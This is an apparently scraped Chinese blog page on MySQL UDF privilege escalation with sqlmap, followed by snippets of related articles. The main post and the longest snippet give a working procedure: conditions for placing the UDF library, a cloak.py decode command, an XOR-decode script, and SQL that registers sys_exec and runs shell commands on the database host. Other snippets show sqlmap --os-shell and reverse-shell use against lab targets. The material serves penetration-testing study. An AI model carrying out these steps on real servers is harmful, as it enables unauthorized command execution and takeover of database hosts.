网络安全中心常见sqlmap udf提权过程

最新推荐文章于 2025-04-08 17:25:08 发布
最新推荐文章于 2025-04-08 17:25:08 发布
阅读量853 收藏 3
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/somnuszhigang/article/details/103163903
本文详细介绍了SQLMap中利用UDF(用户自定义函数)进行提权的过程。首先,UDF是MySQL的一种拓展接口,允许用户自定义功能强大的新函数。接着,讨论了在Windows环境下不同MySQL版本下UDF提权的条件,包括DLL文件的位置和所需权限。最后,提权方法部分讲解了如何在MySQL 5.1及以上版本中创建UDF,以及如何通过解密和复制DLL文件来执行系统命令。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

sqlmap udf提权过程

0x01 UDF

UDF(user defined function)用户自定义函数,是mysql的一个拓展接口。用户可以通过自定义函数实现在mysql中无法方便实现的功能,其添加的新函数都可以在sql语句中调用,就像调用本机函数一样。

0x02 windows下udf提权的条件

如果mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下/ 如果mysql版本小于5.1, udf.dll文件在windows server 2003下放置于c:\windows\system32目录,在windows server 2000下放置在c:\winnt\system32目录。 掌握mysql数据库的账户,从拥有对mysql的insert和delete权限,以创建和抛弃函数。 拥有可以将udf.dll写入相应目录的权限。

0x03 提权方法

如果是mysql5.1及以上版本,必须要把udf.dll文件放到mysql安装目录的lib\plugin文件夹下才能创建自定义函数。该目录默认是不存在的,需要使用webshell找到mysql的安装目录,并在安装目录下创建lib\plugin文件夹,然后将udf.dll文件导出到该目录。

/*

sqlmap\udf\mysql\windows\32目录下存放着lib_mysqludf_sys.dll_

sqlmap\udf\mysql\windows\64目录下为64位的lib_mysqludf_sys.dll_

*/

首先进入到 sqlmap\extra\cloak\cloak 目录下,执行命令:

cloak.py -d -i D:\sqlmap\udf\mysql\windows\32\lib_mysqludf_sys.dll_
最低0.47元/天 解锁文章

200万优质内容无限畅学
mysql window下 安装udf_MySQL数据库UDF
weixin_39958137的博客
01-14 375
UDFUDF(user defined function)用户自定义函数,是mysql的一个拓展接口。用户可以通过自定义函数实现在mysql中无法方便实现的功能,其添加的新函数都可以在sql语句中调用,就像调用本机函数一样。windows下udf的条件·如果mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下/·如果mysql版本小于5.1...
Sqlmap中文使用手册 - UDF模块参数使用
Reset
08-01 551
sqlmap是一款自动化检测与利用sql注入漏洞的免费开源工具。
SQLmap注入获取Webshell及系统限研究.pdf
06-08
SQLmap注入获取Webshell及系统限研究
sqlmap
m0_51822230的博客
05-17 4886
mysql 一.os-shell 建立os-shell前条件: ①必须要有dba限 ②secure_file_priv必须为空,不然无法写入文件 这是secure_file_priv为null的情况下 这是secure_file_priv为空的情况下 ③知道网站的绝对路径 1、首先查看当前用户限,是dba后进行os-shell建立 2、sqlmap -u “http://192.168.43.194/sqli/Less-1/?id=1” --os-shell 在这里选择网页语言,根据网页
利用sqlmap进行mysql的小方法(win与liunx通用)
weixin_33916256的博客
10-12 1024
文章作者:pt007@vip.sina.com文章来源:https://www.t00ls.net/thread-36196-1-1.html1.连接mysql数据打开一个交互shell:sqlmap.py -d mysql://root:root@127.0.0.1:3306/test --sql-shellselect @@version;select @@plugin_dir;d:\\wam...
Sqlmap使用及
qq_43757105的博客
10-16 1万+
目录 一、获取账密 ​二、Sqlmap ​ 一、获取账密 检查注入点,发现存在sql注入 --dbs 检查数据库名 --current-user 当前连接数据库的用户名 --current-db 当前连接数据库的名字 -D "数据库名" 指定目标数据库名 --tables 列出数据库中所有的表名 -T "cms_...
win环境下使用sqlmap写shell + MYSQL(默认就是system限)
weixin_30606461的博客
01-23 1074
今天在来一个mysql (也可以说是默认system的) 在被黑站点找到一个站 先教拿shell是有注入漏洞的 有可能是root限的注入点 可以确定是有注入漏洞的 也得到了 物理路径 这个是很有用的 如果是root限的注入点 那我们可以考虑 写shellD:\wamp\www\js\content.php 有时候物理路径是很有用的上sqlmap注入 使用命令 这个是mys...
TRY HACK ME | GAME ZONE 「SQLMAP+利用反向SSH
AKAHRZ的博客
05-06 1623
TRY HACK ME 渗透测试靶场,以基础为主层层深入,知识点讲解详细,对于想实现从零到一飞跃的白客,TRY HACK ME无非是最好的选择。而网络上资源良莠不齐,好的资源难找的一逼。因此,今天起我将与大家一起详细学习THM重要的ROOM里的内容,力求让每个人都能理解、掌握其中的内容,让我们一起学习、一起进步、一起GET THE FLAG! Steel Mountain「利用powershell」THM靶场:Steel MountainTASK1 谁是最佳员工?TASK2 获得初始 shellT.
mysql sqlmap_MySQL数据库之利用sqlmap进行mysql的小方法(win与liunx通用)
weixin_35829704的博客
01-18 560
本文主要向大家介绍了MySQL数据库之利用sqlmap进行mysql的小方法(win与liunx通用) ,通过具体的内容向大家展现,希望对大家学习MySQL数据库有所帮助。1.连接mysql数据打开一个交互shell:sqlmap.py-dmysql://root:root@127.0.0.1:3306/test--sql-shellselect@@version;select@@p...
sqlmap
2202_75317918的博客
05-18 1108
sqlmap
利用cobaltstrike加sqlmap拿下一个网站并
weixin_45945976的博客
10-21 1317
利用cobaltstrike加sqlmap拿下一个网站并 Cobalt Strike是一款基于java的渗透测试神器,常被业界人称为CS神器。自3.0以后已经不在使用Metasploit框架而作为一个独立的平台使用,分为客户端与服务端,服务端是一个,客户端可以有多个,非常适合团队协同作战,多个攻击者可以同时连接到一个团队服务器上,共享攻击资源与目标信息和sessions,可模拟APT做模拟对抗,进行内网渗透。 Cobalt Strike集成了端口转发、服务扫描,自动化溢出,多模式端口监听,win exe
sqlmap mysql 登录_利用sqlmap进行mysql的小方法(win与liunx通用)
weixin_39745269的博客
01-25 171
标签:文章作者:pt007@vip.sina.com文章来源:https://www.t00ls.net/thread-36196-1-1.html1.连接mysql数据打开一个交互shell:sqlmap.py -d mysql://root:root@127.0.0.1:3306/test --sql-shellselect @@version;select @@plugin_dir;d:\\...
内网渗透模拟演练:使用sqlmap对内网mssql与反弹shell
zh的博客
10-24 4603
准备:假设内网有一台2003服务器(使用mssql数据库),把网页服务80端口映射到防火墙8092端口,外网一台centos用来接收反弹shell 工具:sqlmap、msf、apache sqlmap进行注入 测试页面存在注入点 使用sqlmap进行注入 sqlmap -u "http://61.136.208.30:8092/Content.aspx?ClassId=1&id=4" -p "id" --dbms "mssql" 注入成功,获取到了服务器信息
sqlmap mysql udf_利用SQLMAP获取os-shell的过程分析「UDF
weixin_33089993的博客
02-04 1552
结论关于MySQL读写文件的条件限制是老生常谈的问题,由于SQLMAP获取os-shell的两种方法均需要文件写入操作,这里先摆出结论:1、MySQL服务默认以mysql用户限启动,并没有危险目录(/usr/lib64/mysql/plugin[root 755]、/var/www/html[root 755]、/var/spool/cron[root 700]、/root/.ssh[root ...
sqlmap mysql udf_Mysql-基于Mysql的UDF(Linux系统)
weixin_34696006的博客
01-30 871
基于Mysql的UDF(Linux系统)【实验目的】??通过本实验理解如何通过webshell结合sqlmap自带的dll文件对Linux系统进行UDF,熟悉UDF的主要方法。【实验环境】攻击机:Kali-pri用户名college,密码360College目标靶机:CentOS-sqli-lab用户名college,密码360College【实验原理】??scp命令简介:??scp是...
sqlmap udf过程
MzHeader的博客
07-04 3114
常见的未授访问漏洞: Redis 未授访问漏洞 MongoDB 未授访问漏洞 Jenkins 未授访问漏洞 Memcached 未授访问漏洞 JBOSS 未授访问漏洞 VNC 未授访问漏洞 Docker 未授访问漏洞 ZooKeeper 未授访问漏洞 Rsync 未授访问漏洞 Atlassian Crowd 未授访问漏洞 CouchDB 未授访问漏洞 Elasticsearch 未授访问漏洞 Hadoop 未授访问漏洞 Jupyter Notebook 未授访问漏洞 Red
SQLMAP自动注入-ENUMERATION、BRUTE FORCE、UDF IN
chenmaoyin1482的博客
08-08 256
伪静态页面不能注入,这是错误的! SQLMAP自动注入08-----ENUMERATION --current-user --current-db --hostname --users --privileges -U username (CU当前账号) --roles --db...
SQLMAP工具详解
热门推荐
weixin_56218159的博客
06-02 1万+
免责声明 该文章仅用于信息防御技术的交流和学习,请勿用于其他用途; 在未得到网站授下,禁止对政府、事业单位、企业或其他单位网站及系统进行渗透测试;技术是把双刃剑,请遵纪守法,做一名合格的白帽子安全专家,为国家的网络安全事业做出贡献; ...
【VulnHub靶场】超全详解DC-8之sqlmap注入与exim渗透
最新发布
2301_77091612的博客
04-08 1143
eximsqlmap自动注入
sqlmap udf
03-14
### SQLMap UDF 教程 #### 背景介绍 SQL注入攻击是一种常见的安全漏洞,允许攻击者通过恶意输入操纵数据库查询。为了进一步限并控制目标服务器,可以利用 **User Defined Functions (UDF)** 技术来执行操作系统级别的命令。 在 MySQL 中,可以通过加载自定义的共享库文件(如 `.so` 或 `.dll`),扩展其功能以支持新的函数调用。这种技术常被用于渗透测试中的升场景[^1]。 --- #### 条件准备 要成功完成 UDF 操作,需满足以下条件: - 攻击者已获取到具有高限(如 `root` 用户)的 MySQL 数据库访问限。 - 当前用户拥有足够的限,在 MySQL 中创建新函数以及删除旧函数。 - 需要在目标主机上上传特定的动态链接库文件(Linux 下为 `.so` 文件;Windows 下为 `.dll` 文件)。这些文件通常位于 SQLMap 的安装目录下[^2]。 --- #### 实现过程详解 ##### 1. 准备必要的动态链接库文件 SQLMap 已经内置了一些预编译好的动态链接库文件供测试人员使用。对于 Linux 平台上的 MySQL 数据库,默认路径如下: ```bash /usr/share/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so_ ``` 注意:该文件可能经过简单的异或加密处理,因此需要先对其进行解密才能正常使用[^3]。 解码脚本示例: ```python def xor_decode(input_file, output_file): key = b'\x07' # 默认使用的XOR秘钥值为ASCII字符 '7' with open(input_file, 'rb') as f_in: data = bytearray(f_in.read()) for i in range(len(data)): data[i] ^= ord(key) with open(output_file, 'wb') as f_out: f_out.write(data) xor_decode('lib_mysqludf_sys.so_', 'lib_mysqludf_sys.so') ``` 上述代码会生成一个新的未加密版本的 `lib_mysqludf_sys.so` 文件。 --- ##### 2. 将解码后的 .so 文件上传至远程服务器 借助 SQL 注入漏洞或者直接登录数据库的方式,把刚才得到的目标二进制文件传送到受害机器上面去。这里推荐采用 SQLMap 自带的功能模块简化此流程: ```bash python cloak.py -d -i /usr/share/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so_ ``` 这条指令的作用是从本地读取指定位置处的原始数据包,并将其伪装成适合传输的形式发送出去。 --- ##### 3. 创建新的系统级函数 一旦确认所需的外部依赖项已经就绪,则可通过下面这段 SQL 命令注册对应的插件接口: ```sql CREATE FUNCTION sys_exec RETURNS INT SONAME 'lib_mysqludf_sys.so'; ``` 这一步骤实际上就是在告诉 MySQL 引擎,“以后每当遇到名为 `sys_exec()` 的地方,请按照我们刚刚供的那个外部程序逻辑运行”。 --- ##### 4. 执行任意 Shell Command 最后也是最关键的环节来了——现在你可以尝试调用刚建立起来的新功能啦! 比如查看当前工作目录的内容列表: ```sql SELECT sys_exec('/bin/bash','-c','ls'); ``` 如果一切正常的话,应该能够看到返回的结果集中包含了预期的信息片段[^4]。 --- ### 注意事项 尽管这种方法非常强大有效,但在实际应用过程中也存在诸多限制因素需要考虑清楚才行。例如不同操作系统架构之间可能存在兼容性差异等问题都需要前做好充分调研准备工作才行哦~ ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值